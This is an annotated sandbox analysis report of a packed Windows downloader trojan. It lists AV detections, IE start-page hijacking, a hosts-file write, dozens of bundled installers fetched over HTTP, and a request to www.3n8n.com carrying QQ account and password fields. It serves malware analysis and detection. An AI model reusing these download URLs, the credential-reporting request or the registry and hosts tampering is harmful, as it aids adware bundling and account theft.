Analysis Date: 2014-11-22 06:09:44
MD5: 63e64838a49a23e3de2d82b7bd59a8a6
SHA1: 89f502a624c51ebf6d4b6dad3d43c37bf1b0387b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0  md5: d41d8cd98f00b204e9800998ecf8427e  sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709  size: 0  (raw size 0, so both hashes are simply the hashes of empty input; under the UPX layout this section is only the in-memory decompression area)
Section UPX1  md5: 8d998c62285631a7fb14d3b1ac99c585  sha1: 900db9d142bf0ef689d987d33e36336dd09c7c7e  size: 217600  (holds the compressed payload under the UPX layout)
Section UPX2  md5: bf7aef12f9ab1a21aa165814ad5b2dfb  sha1: 1a7f55a28c06d9f01f4bd884ffbffeeef6d83fa7  size: 1024
Timestamp: 2014-10-14 02:06:57  (presumably the PE header compile timestamp — about five weeks before the analysis date; trivially forgeable, so treat it as a hint only)
Packer: UPX -> www.upx.sourceforge.net
PEhash: dff82cfb0296a611589f5b80c5979cb6bdecb77c
IMPhash: 12949835d0cda9d5836fa2fbd6c55e3c  (computed over the packed image, so it reflects the UPX stub's minimal import table — typically LoadLibraryA/GetProcAddress/VirtualProtect/ExitProcess, all of which appear in the strings below — rather than the real payload's imports; unpack before using it for clustering)
AV 360 Safe ➝ Gen:Variant.Symmi.42740
AV Ad-Aware ➝ Gen:Variant.Symmi.42740
AV Alwil (avast) ➝ Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir) ➝ no_virus
AV Authentium ➝ W32/Trojan.UZRS-1995
AV Avira (antivir) ➝ TR/Dldr.Agent.219648.3
AV BullGuard ➝ Gen:Variant.Symmi.42740
AV CA (E-Trust Ino) ➝ Win32/Oflwr.A!crypt
AV CAT (quickheal) ➝ no_virus
AV ClamAV ➝ no_virus
AV Dr. Web ➝ no_virus
AV Emsisoft ➝ Gen:Variant.Symmi.42740
AV Eset (nod32) ➝ Win32/Agent.WCF
AV Fortinet ➝ W32/Agent.WCF!tr
AV Frisk (f-prot) ➝ no_virus
AV F-Secure ➝ Gen:Variant.Symmi.42740
AV Grisoft (avg) ➝ Agent5.BIT
AV Ikarus ➝ Trojan.Win32.Agent
AV K7 ➝ Trojan ( 0049c9161 )
AV Kaspersky ➝ Trojan-Downloader.Win32.Generic:Trojan.Win32.Hosts2.gen
AV MalwareBytes ➝ no_virus
AV Mcafee ➝ RDN/Generic.dx!dgq
AV Microsoft Security Essentials ➝ no_virus
AV MicroWorld (escan) ➝ Gen:Variant.Symmi.42740
AV Rising ➝ no_virus
AV Sophos ➝ no_virus
AV Symantec ➝ no_virus
AV Trend Micro ➝ no_virus
AV VirusBlokAda (vba32) ➝ no_virus
(17 of 29 engines detect the sample on the analysis date. The names are generic — Agent / Symmi / Downloader — with Avira's "Dldr" and Kaspersky's "Trojan-Downloader … Hosts2.gen" being the only labels that describe behaviour, and both agree with the runtime activity below. Microsoft, Symantec, Sophos and Trend Micro return nothing, so endpoint AV alone should not be relied on to find this.)

Runtime Details:  (summary — the sample behaves as a downloader / installer bundler: it sets the IE start page to 2345.com, writes the hosts file, fetches and drops a dozen third-party installers plus several .jpg files into Common Files over plain HTTP, and contacts www.3n8n.com with empty QQ-account parameters)


Process
↳ C:\malware.exe   (the sample is renamed malware.exe by the sandbox; no child processes are recorded, so the installers it drops were apparently not launched during this run — their behaviour is not covered by this report)

Registry HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.2345.com/?kkkkkkkk2345\\x00   (IE start-page hijack to 2345.com; the trailing `\\x00` appears to be the report's rendering of a NUL byte written into the value — useful as an exact-match registry indicator)
Registry HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage ➝
NULL   (the policy value that locks the IE home page against user changes; the report shows the written data as NULL, so whether it was set or cleared cannot be determined here)
Registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL   (backs Explorer's "Show hidden files and folders" option; tampering with it is a common way to keep dropped files out of sight — data again shown as NULL)
Creates File C:\WINDOWS\system32\drivers\etc\hosts   (hosts-file write — consistent with Kaspersky's Trojan.Win32.Hosts2.gen label above; the entries written are not shown in this report, so the modified file should be collected from the sandbox to see which domains were redirected)
Creates File C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Creates File C:\Program Files\Common Files\tqrl_97_1957.exe
Creates File C:\Program Files\Common Files\xtsszs_mt4.exe
Creates File C:\Program Files\Common Files\YoudaoDict_silent3.exe
Creates File C:\Program Files\Common Files\OfficeAssist.0195.80.1054.exe
Creates File C:\Program Files\Common Files\kt_b_80213.exe
Creates File C:\Program Files\Common Files\qhse_7654_5943.jpg
Creates File C:\Program Files\Common Files\jgimeside_yllm_12359.exe
Creates File C:\Program Files\Common Files\setup_t10303.exe
Creates File C:\Program Files\Common Files\setup_s1020.exe
Creates File C:\Program Files\Common Files\asdqw_3104-48740.JPG
Creates File C:\WINDOWS\system32\unrar.dll
Creates File C:\Program Files\Common Files\b5t_setup_s093.exe
Creates File C:\Program Files\Common Files\bdsd.jpg
Creates File C:\Program Files\Common Files\appers_7_1958.exe
Creates File C:\Program Files\Common Files\shanhu_7654_356.jpg
Creates File C:\Program Files\Common Files\365weatherIns_257.exe
Deletes File C:\Program Files\Common Files\qhse_7654_5943.jpg
Deletes File C:\Program Files\Common Files\bdsd.jpg
Deletes File C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
(The dropped .exe names match the files fetched over HTTP below, so C:\Program Files\Common Files\ is the staging directory to sweep. Four .jpg files are written but their local names do not correspond to the remote .jpg names, and two of them plus the 2345 installer are deleted again during the run; whether the .jpg files were genuine images or disguised payloads cannot be told from this report. unrar.dll placed in system32 is presumably a helper for unpacking further downloads — verify its hash against a known-good copy rather than assuming it is benign.)
Winsock URL http://dl.b5m.cn/marketing/b5t_setup_s093.exe
Winsock URL http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URL http://d3.freep.cn/3tb_140923192942q71f538987.jpg
Winsock URL http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
Winsock URL http://codown.youdao.com/cidian/YoudaoDict_silent3.exe
Winsock URL http://xz.dianxinshu.com/download/setup_s1020.exe
Winsock URL http://d3.freep.cn/3tb_140917191931o0a2538987.jpg
Winsock URL http://down.9vh.net/appers_7_1958.exe
Winsock URL http://d3.freep.cn/3tb_141007222757xfui539918.jpg
Winsock URL http://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_mt4.exe
Winsock URL http://down.qunasou.com/kt/kt_b_80213.exe
Winsock URL http://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
Winsock URL http://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
Winsock URL http://down.waisong8.com/input/jgimeside_yllm_12359.exe
Winsock URL http://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword= 6   (raw form of the request logged below as `…qqpassword=%20%206`; both QQ-account fields are empty, so this looks like a check-in or credential-reporting endpoint that found nothing to send inside the sandbox — www.3n8n.com is the most interesting indicator in this list, the rest are public download/CDN hosts of bundled software)
Winsock URL http://down.95kd.com/update/365/365weatherIns_257.exe
Winsock URL http://down.tianyunxj.com/tqrl_97_1957.exe

Network Details:

DNSwebmirror.pcbeta.com
Type: A
113.107.42.25
DNSdown.9vh.net
Type: A
222.186.60.3
DNSdown.waisong8.com
Type: A
218.75.110.13
DNSgnop012.tlgslb.com
Type: A
125.78.248.73
DNSgnop012.tlgslb.com
Type: A
125.78.248.74
DNSgnop012.tlgslb.com
Type: A
27.152.191.39
DNSc06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNSc06.i06.arnic.hadns.net
Type: A
183.61.10.249
DNSdown.95kd.com
Type: A
122.225.100.200
DNSxtsszs.oss-cn-hangzhou.aliyuncs.com
Type: A
42.120.230.9
DNS360.band.glb0.ldcache.net
Type: A
202.97.174.82
DNS360.band.glb0.ldcache.net
Type: A
183.61.19.168
DNSbgp5.yandui.com
Type: A
222.186.60.10
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSbgp5.yandui.com
Type: A
60.222.232.216
DNSopt.dl.glb0.lxdns.com
Type: A
70.39.191.87
DNSbgp5.yandui.com
Type: A
60.222.232.216
DNSbgp5.yandui.com
Type: A
222.186.60.10
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSdownload012.rdb.cnc.ccgslb.com.cn
Type: A
61.179.105.148
DNSdownload012.rdb.cnc.ccgslb.com.cn
Type: A
221.194.130.10
DNSimg.freep.cn
Type: A
221.234.36.167
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSwww.3n8n.com
Type: A
118.193.155.117
DNS cdn.pcbeta.attachment.inimc.com
Type: A
DNS dl.b5m.cn
Type: A
DNS down.tianyunxj.com
Type: A
DNS down.xiaoxinrili.com
Type: A
DNS xz.dianxinshu.com
Type: A
DNS codown.youdao.com
Type: A
DNS down.qunasou.com
Type: A
DNS wdl1.cache.wps.cn
Type: A
DNS d3.freep.cn
Type: A
DNS jifendownload.2345.cn
Type: A
(No A record is recorded for these ten names, yet each of them was fetched — see the HTTP GETs and flows below — so they presumably resolved through CNAMEs to the CDN hostnames listed above, e.g. tlgslb.com, ccgslb.com.cn, ldcache.net, lxdns.com and hadns.net. Block or alert on the original names, not on the CDN addresses, which are shared infrastructure.)
HTTP GET http://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
User-Agent: (none sent)
HTTP GET http://down.9vh.net/appers_7_1958.exe
User-Agent: (none sent)
HTTP GET http://down.waisong8.com/input/jgimeside_yllm_12359.exe
User-Agent: (none sent)
HTTP GET http://dl.b5m.cn/marketing/b5t_setup_s093.exe
User-Agent: (none sent)
HTTP GET http://down.tianyunxj.com/tqrl_97_1957.exe
User-Agent: (none sent)
HTTP GET http://down.95kd.com/update/365/365weatherIns_257.exe
User-Agent: (none sent)
HTTP GET http://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_mt4.exe
User-Agent: (none sent)
HTTP GET http://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent: (none sent)
HTTP GET http://xz.dianxinshu.com/download/setup_s1020.exe
User-Agent: (none sent)
HTTP GET http://codown.youdao.com/cidian/YoudaoDict_silent3.exe
User-Agent: (none sent)
HTTP GET http://down.qunasou.com/kt/kt_b_80213.exe
User-Agent: (none sent)
HTTP GET http://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
User-Agent: (none sent)
HTTP GET http://d3.freep.cn/3tb_140923192942q71f538987.jpg
User-Agent: (none sent)
HTTP GET http://d3.freep.cn/3tb_141007222757xfui539918.jpg
User-Agent: (none sent)
HTTP GET http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent: (none sent)
HTTP GET http://d3.freep.cn/3tb_140917191931o0a2538987.jpg
User-Agent: (none sent)
HTTP GET http://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
(Every installer/image fetch is a bare `GET … HTTP/1.1` carrying only `Host:` and `Cache-Control: no-cache` and no User-Agent header — visible in the raw requests below — which is a usable network-detection feature for .exe downloads on a network where browsers and updaters always send one. Only the www.3n8n.com request carries a User-Agent, and it is a hard-coded MSIE 6.0 / Windows XP string.)
Flows TCP 192.168.1.1:1031 ➝ 113.107.42.25:80
Flows TCP 192.168.1.1:1032 ➝ 222.186.60.3:80
Flows TCP 192.168.1.1:1033 ➝ 218.75.110.13:80
Flows TCP 192.168.1.1:1034 ➝ 125.78.248.73:80
Flows TCP 192.168.1.1:1035 ➝ 183.57.148.246:80
Flows TCP 192.168.1.1:1036 ➝ 122.225.100.200:80
Flows TCP 192.168.1.1:1037 ➝ 42.120.230.9:80
Flows TCP 192.168.1.1:1038 ➝ 202.97.174.82:80
Flows TCP 192.168.1.1:1039 ➝ 222.186.60.10:80
Flows TCP 192.168.1.1:1040 ➝ 70.39.191.87:80
Flows TCP 192.168.1.1:1041 ➝ 60.222.232.216:80
Flows TCP 192.168.1.1:1042 ➝ 61.179.105.148:80
Flows TCP 192.168.1.1:1043 ➝ 221.234.36.167:80
Flows TCP 192.168.1.1:1044 ➝ 221.234.36.167:80
Flows TCP 192.168.1.1:1045 ➝ 60.191.223.15:80
Flows TCP 192.168.1.1:1046 ➝ 221.234.36.167:80
Flows TCP 192.168.1.1:1047 ➝ 118.193.155.117:80
(192.168.1.1 is the sandbox guest's address. All seventeen flows are plaintext HTTP on TCP/80 — no TLS, no non-standard ports — so the complete set of downloaded files can be carved from the capture for their own analysis.)

Raw Pcap  (request bytes only, no responses. Each dump is printed at a fixed length, and the bytes that follow a request's terminating `0d0a0d0a` — e.g. the `cdn.pcbeta.attac…` tail under the down.9vh.net request, or `ache ..` under the 2345.cn one — appear to be residue of the previous dump's buffer rather than data sent on that connection; ignore them when building signatures.)
0x00000000 (00000)   47455420 2f646174 612f6174 74616368   GET /data/attach
0x00000010 (00016)   6d656e74 2f666f72 756d2f32 30313430   ment/forum/20140
0x00000020 (00032)   392f3132 2f313733 39333769 6d617639   9/12/173937imav9
0x00000030 (00048)   79766379 636e3361 6b75612e 6a706720   yvcycn3akua.jpg 
0x00000040 (00064)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f617070 6572735f 375f3139   GET /appers_7_19
0x00000010 (00016)   35382e65 78652048 5454502f 312e310d   58.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 3976682e   .Host: down.9vh.
0x00000030 (00048)   6e65740d 0a436163 68652d43 6f6e7472   net..Cache-Contr
0x00000040 (00064)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f696e70 75742f6a 67696d65   GET /input/jgime
0x00000010 (00016)   73696465 5f796c6c 6d5f3132 3335392e   side_yllm_12359.
0x00000020 (00032)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000030 (00048)   73743a20 646f776e 2e776169 736f6e67   st: down.waisong
0x00000040 (00064)   382e636f 6d0d0a43 61636865 2d436f6e   8.com..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6d6172 6b657469 6e672f62   GET /marketing/b
0x00000010 (00016)   35745f73 65747570 5f733039 332e6578   5t_setup_s093.ex
0x00000020 (00032)   65204854 54502f31 2e310d0a 486f7374   e HTTP/1.1..Host
0x00000030 (00048)   3a20646c 2e62356d 2e636e0d 0a436163   : dl.b5m.cn..Cac
0x00000040 (00064)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000050 (00080)   61636865 0d0a0d0a 2d636163 68650d0a   ache....-cache..
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f747172 6c5f3937 5f313935   GET /tqrl_97_195
0x00000010 (00016)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000020 (00032)   486f7374 3a20646f 776e2e74 69616e79   Host: down.tiany
0x00000030 (00048)   756e786a 2e636f6d 0d0a4361 6368652d   unxj.com..Cache-
0x00000040 (00064)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000050 (00080)   650d0a0d 0a0a0d0a 2d636163 68650d0a   e.......-cache..
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f757064 6174652f 3336352f   GET /update/365/
0x00000010 (00016)   33363577 65617468 6572496e 735f3235   365weatherIns_25
0x00000020 (00032)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000030 (00048)   486f7374 3a20646f 776e2e39 356b642e   Host: down.95kd.
0x00000040 (00064)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000050 (00080)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f787473 737a735f 6d74342e   GET /xtsszs_mt4.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000020 (00032)   73743a20 78747373 7a732e6f 73732d63   st: xtsszs.oss-c
0x00000030 (00048)   6e2d6861 6e677a68 6f752e61 6c697975   n-hangzhou.aliyu
0x00000040 (00064)   6e63732e 636f6d0d 0a436163 68652d43   ncs.com..Cache-C
0x00000050 (00080)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000060 (00096)   0d0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303330 332e6578 65204854   up_t10303.exe HT
0x00000020 (00032)   54502f31 2e310d0a 486f7374 3a20646f   TP/1.1..Host: do
0x00000030 (00048)   776e2e78 69616f78 696e7269 6c692e63   wn.xiaoxinrili.c
0x00000040 (00064)   6f6d0d0a 43616368 652d436f 6e74726f   om..Cache-Contro
0x00000050 (00080)   6c3a206e 6f2d6361 6368650d 0a0d0a65   l: no-cache....e
0x00000060 (00096)   0d0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f7365   GET /download/se
0x00000010 (00016)   7475705f 73313032 302e6578 65204854   tup_s1020.exe HT
0x00000020 (00032)   54502f31 2e310d0a 486f7374 3a20787a   TP/1.1..Host: xz
0x00000030 (00048)   2e646961 6e78696e 7368752e 636f6d0d   .dianxinshu.com.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 0a0d0a65   no-cache.......e
0x00000060 (00096)   0d0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f636964 69616e2f 596f7564   GET /cidian/Youd
0x00000010 (00016)   616f4469 63745f73 696c656e 74332e65   aoDict_silent3.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a486f73   xe HTTP/1.1..Hos
0x00000030 (00048)   743a2063 6f646f77 6e2e796f 7564616f   t: codown.youdao
0x00000040 (00064)   2e636f6d 0d0a4361 6368652d 436f6e74   .com..Cache-Cont
0x00000050 (00080)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000060 (00096)   0a0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6b742f 6b745f62 5f383032   GET /kt/kt_b_802
0x00000010 (00016)   31332e65 78652048 5454502f 312e310d   13.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 71756e61   .Host: down.quna
0x00000030 (00048)   736f752e 636f6d0d 0a436163 68652d43   sou.com..Cache-C
0x00000040 (00064)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000050 (00080)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f777073 2f646f77 6e6c6f61   GET /wps/downloa
0x00000010 (00016)   642f4f66 66696365 41737369 73742e30   d/OfficeAssist.0
0x00000020 (00032)   3139352e 38302e31 3035342e 65786520   195.80.1054.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000040 (00064)   77646c31 2e636163 68652e77 70732e63   wdl1.cache.wps.c
0x00000050 (00080)   6e0d0a43 61636865 2d436f6e 74726f6c   n..Cache-Control
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 39323331   GET /3tb_1409231
0x00000010 (00016)   39323934 32713731 66353338 3938372e   92942q71f538987.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 74726f6c   no-cache....trol
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f337462 5f313431 30303732   GET /3tb_1410072
0x00000010 (00016)   32323735 37786675 69353339 3931382e   22757xfui539918.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 74726f6c   no-cache....trol
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 486f7374   e HTTP/1.1..Host
0x00000050 (00080)   3a206a69 66656e64 6f776e6c 6f61642e   : jifendownload.
0x00000060 (00096)   32333435 2e636e0d 0a436163 68652d43   2345.cn..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 61636865 2085c6              ....ache ..

0x00000000 (00000)   47455420 2f337462 5f313430 39313731   GET /3tb_1409171
0x00000010 (00016)   39313933 316f3061 32353338 3938372e   91931o0a2538987.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 6f61642e   no-cache....oad.
0x00000060 (00096)   32333435 2e636e0d 0a436163 68652d43   2345.cn..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 61636865 2085c6              ....ache ..

0x00000000 (00000)   47455420 2f78696e 382f6d61 696c2e61   GET /xin8/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 26717170   sp?qqnumber=&qqp
0x00000020 (00032)   61737377 6f72643d 25323025 32303620   assword=%20%206 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000050 (00080)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000060 (00096)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000070 (00112)   204e5420 352e313b 20535631 290d0a48    NT 5.1; SV1)..H
0x00000080 (00128)   6f73743a 20777777 2e336e38 6e2e636f   ost: www.3n8n.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....


Strings  (extracted from the packed image, so almost all of this is UPX compression noise. The readable fragments — `32\taskmgr.exe`, `rs\etc\ho`, `HKEY_LOC`, `InternetOpenA`, `PathMatchSpecA`, `RegFlushKey`, `la/4.0 (`, `QQ…` and the DLL names — are partial and should be re-extracted from an unpacked copy before being used as indicators.)
.
t
.F4
.
.0
S.P/..
..$
.
.
.J.
.
...C`....
.
(
+;..
....u
..3
{.|.2..
..
}u
.
t
.F4
.
.0
S.P/..
..$
.
.
.J.
.
...C`....
.
(
+;..
....u
..3
{.|.2..
..
}u

>	>">.
 !"#$%&'()*+,-./
0 0&0,02
010:0G0S0g0m0
02*<>|"
;,0,271O
 (08@P`p
<09?EI
0B=`[!
0/b/{V
0GHUy5
<0<N`p
 0@P`jg
0s32fta	l
;1;?;{;
\`1!+_"&
1 1$1(Pt
1%1B1U1^1
@1`1d>
129z&\l
\16?[B
170u >moi
1c8g8k8o8s8w8{
1g@=+#.
	1i7DFl
<*>1>j>q
1#QNAN
1RP-t,&
1v1z1~1
1W} 4Z
2(252;2O2
2275622D8D
?*?.?2?6?:
,'2ew0
/+2P0Z39
2~q5Ww
32\taskmgr.exe
3$3(3H
35138b9
:(>->3>8>Y>w>
.$~3e-I
3[M<'%
3V0Y1M
]41tR6.
4511da95:8642fc
45OOBg
465p5X7
4,84<4\4`4d
4C:3FS
4$,C4Q4a4p4
4\<`<d<hg
$,4<DW
4~f9.u
4!fbDK
&4FTbpy
4IJKLMNO
/4s\Blu
4y2rr8c
\+50vi(8PX
517xky.we(d7
5(54~H5h5t5
56a(kC
"57-1546-4
[5A#dH
(5I`^O
5kE53&HV
5x0lVblv)
	5Yn8(XfF-.nns
60-m9	|{
647X7`
6!6(6/6N6U6\6c6
6,686<
6/\6.8l
673E|7
6"7-7Q
6789abcdef
:6dxINM|[F
6~=	F%
6GH&$J
6k>o>s
6L(:2D
6<o"IlX
	6P`XL
^+6/S)
6TJ)p;T
\\(6@"V
!6WjaPgfO
<6Z2ea7be1
7$:(:,
70K0_R
>7,2(eh
"7365we
73937Zav9yvcycn3aku
75f06e
77>7E7L
)77=Ano
7/7Sr"818;9X9
7)8j<A=X=u=
7=_B'9
7DWORD4A
7/Format
7*gic_
7K8\8j8
,&80$	S
8273I3
^,(8	7
8740.JPG_c
8"8(8.848:ZF
88**P{O
-8au'ru!
8B0 4`
<8C8J8Q8X8_8f8
#{8+{d,
8d(:2,
8f494a2afdb0c
&8-Fk*
 8G120
(8l@03
8lK`E@
8T) L#
#8UP*$J
`@8VfB
`8Z8d8
900FB7
91yG	f3
/930,H
942q71f
959@9y9
96>NH9NvZ
98:T:\:d:u:
\=9!~a
9h</2$
9hP1i	
9`:i:r:~:
="=9=J=
9J:n:t:z:
9^m>tR;
9r<h$x
+9w,)G
(>$+`A)
A!3;WF
a-5d9fbd-8
aAn!EH
AB9,Mf
@/:;<=>?@ABCDEH
@ACL@TM
A,dlM}
?ADVAPI
ADVAPI32.dll
a_e?Fl
_AFX_j_ST
AfxOldhProc
ais#"T
and Object
AndSZ`
Ao8l\0YG
ap$<pN
AQ)-*5A
a*"R9E
Array<char>
?AtCA#
ATL.DLL
>Augu"
